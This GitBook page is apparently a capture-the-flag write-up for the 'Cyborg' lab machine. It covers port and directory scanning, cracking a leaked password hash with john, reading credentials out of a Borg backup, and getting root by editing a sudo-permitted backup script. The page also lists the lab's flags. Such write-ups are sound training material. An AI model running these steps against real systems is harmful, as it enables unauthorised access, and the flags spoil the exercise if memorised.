🙌
Writeups
LearningLinkedIn
  • The Great Escape
  • Lookback
  • Outlook NTLM Leak
  • Year of the Fox
  • PS Eclipse
  • Eavesdropper
  • Tony the Tiger
  • Intro to Offensive Security
  • MD2PDF
  • Content Security Policy
  • Agent T
  • Introduction to Flask
  • Atlas
  • Bugged
  • Sigma
  • Intro to Cloud Security
  • Holo
  • CCT2019
  • Opacity
  • Empline
  • Phishing Emails 5
  • BlueTeam
  • Tempest
  • hackerNote
  • Watcher
  • CMesS
  • HA Joker CTF
  • OWASP Top 10 2021
  • Metasploit
  • Oh My WebServer
  • Road
  • Anonymous
  • Ollie
  • Training for New Analyst
  • Tokyo Ghoul
  • Dependency Management
  • KoTH Food CTF
  • Android Malware Analysis
  • Intro To Pwntools
  • AD Certificate Templates
  • CVE 2022 26923
  • Basic Static Analysis
  • Introduction To Honeypots
  • Intro to Pipeline Automation
  • Intro to Containerisation
  • ARP Spoofing
  • Mindgames
  • Brute Force Heroes
  • SQLMAP
  • Insekube
  • TakeOver
  • Boiler CTF
  • GoldenEye
  • Splunk 3
  • Tempus Fugit Durius
  • Warzone 1
  • OWASP API Security Top 10 2
  • Temple
  • AllSignsPoint2Pwnage
  • OWASP API Security Top 10 1
  • Secret Recipe
  • NoNameCTF
  • Binex
  • Jack
  • Tactical Detection
  • Jurassic Park
  • DX1 Liberty Island
  • Brute
  • Biblioteca
  • Napping
  • Kubernetes for Everyone
  • 0day
  • Osiris
  • Set
  • NoSQL injection Basics
  • Warzone 2
  • Atlassian, CVE 2022 26134
  • Jason
  • VulnNet: Roasted
  • VulnNet Internal
  • VulnNet Node
  • Brooklyn Nine Nine
  • Thompson
  • The Cod Caper
  • Neighbour
  • ColddBox Easy
  • Library
  • All in One
  • Poster
  • Gallery
  • Cat Pictures
  • Boogeyman 1
  • Corridor
  • Team
  • Ra 2
  • Advent of Cyber 2022
  • Bookstore
  • Intro to Malware Analysis
  • TheHive Project
  • Velociraptor
  • KAPE
  • Lunizz CTF
  • Linux Forensics
  • DFIR An Introduction
  • Benign
  • Cyborg
  • Year of the rabbit
  • Blaster
  • Easy Peasy
  • Couch
  • Chocolate Factory
  • REmux The Tmux
  • Spring4Shell
  • Dirty Pipe
  • OverlayFS
  • Pwnkit
  • CTF collection Vol.2
  • Gotta Catch'em All!
  • Break Out The Cage
  • Bolt
  • Source
  • AttackerKB
  • Intro to Defensive Security
  • Careers in Cyber
  • OSI Model
  • Packets&Frames
  • Extending Your Network
  • How websites work
  • Putting it all together
  • Operating System Security
  • Network Security
  • Security Operations
  • Network Services
  • Network Services 2
  • Active Directory Basics
  • Attacking Kerberos
  • Subdomain Enumeration
  • Authentication Bypass
  • IDOR
  • File Inclusion
  • Masterminds
  • SSRF
  • Command Injection
  • Cross site Scripting
  • Burp Suite Extender
  • Burp Suite Intruder
  • Surfer
  • Willow
  • Conti
  • Unattended
  • Tardigrade
Powered by GitBook
On this page
  • ping
  • rustscan
  • gobuster
  • john
  • Borg Backup
  • ssh
  • priv esc

Was this helpful?

Cyborg

sudo openvpn WittyAle.ovpn

ping

ping 10.10.181.155

rustscan

rustscan -a 10.10.181.155 --ulimit 5000 -b 65535 -- -A 

gobuster

gobuster dir --url http://10.10.181.155 -w /usr/share/wordlists/dirb/common.txt -t 30 -k -x py,html,txt

==/admin , /etc==

10.10.181.155/etc/squid/passwd

music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

john

john --wordlist=/usr/share/wordlists/rockyou.txt passwd 
 john passwd --show  

==cracked -> music_archive:squidward==

10.10.181.155/admin/admin.html download -> archive.tar

Borg Backup

tar -xf archive.tar
tree home
cd cyborg/home/field/dev
borg list final_archive 

==passphrase: squidward==

borg list final_archive::music_archive
borg extract final_archive::music_archive
cat home/alex/Desktop/secret.txt

shoutout to all the people who have gotten to this stage whoop whoop!"

cat home/alex/Documents/note.txt 

Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:S3cretP@s3

ssh

ssh alex@10.10.181.155

priv esc

sudo -l

==(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh==

chmod 777 /etc/mp3backups/backup.sh
nano /etc/mp3backups/backup.sh

add #2 line -> sudo /bin/bash

sudo /etc/mp3backups/backup.sh 
  • Scan the machine, how many ports are open? 2

  • What service is running on port 22? ssh

  • What service is running on port 80? http

  • What is the user.txt flag? flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}

  • What is the root.txt flag? flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}

[[Blaster]]

PreviousBenignNextYear of the rabbit

Last updated 2 years ago

Was this helpful?